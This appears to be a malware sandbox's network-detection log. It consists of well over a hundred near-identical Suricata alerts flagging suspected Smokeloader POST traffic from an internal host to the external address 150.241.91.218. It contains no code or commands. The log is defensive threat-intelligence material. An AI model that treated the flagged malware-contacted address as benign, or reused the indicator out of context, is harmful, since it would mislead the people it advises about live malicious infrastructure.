        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49971 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50052 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50049 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49933 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49870 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49973 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50037 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49967 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50043 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50155 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49986 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50073 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49996 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50135 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50011 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49946 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49960 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50063 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49881 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49981 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50080 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50007 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50068 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49990 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50077 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50014 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50082 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50141 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49998 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50192 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49968 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50084 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49914 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49993 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50086 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50083 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50097 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50093 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50017 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49992 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50147 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50248 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49985 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49975 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50107 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50013 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50041 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50019 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50129 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49924 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50025 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50098 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50100 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50110 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49978 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50001 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50036 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50152 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50134 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49928 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50028 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50076 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50256 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50000 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50048 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50102 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50105 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50111 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50008 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49987 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50170 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50143 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50053 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49931 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50103 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50044 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50005 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50072 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50263 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50171 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50130 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50114 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49989 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50151 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50109 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49977 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50185 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50012 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50112 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50020 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50045 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50085 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50270 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50168 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50175 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50199 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50054 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50113 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50157 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50006 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50188 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50018 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50075 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50022 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50117 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50031 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50317 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50173 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50090 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50057 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50181 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50149 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50219 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50024 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50198 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50124 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50078 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50032 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50184 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50035 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50038 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50118 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50189 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50227 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50207 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50341 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50059 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50050 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50174 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50132 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50209 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50034 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50104 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50047 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50119 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50187 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50239 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50042 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50201 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50067 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50056 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50210 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50055 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50215 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50179 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50039 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50158 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50133 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50213 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50120 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50061 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50244 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50251 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50079 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50235 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50099 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50058 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50258 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50070 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50145 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50136 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50106 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50228 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50164 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50265 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50241 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50274 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50101 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50089 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50262 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50237 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50081 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50074 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50259 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50140 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50154 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50193 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50108 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50266 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50264 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50356 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50123 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50275 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50247 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50127 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50088 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50094 -> 150.241.91.218:80
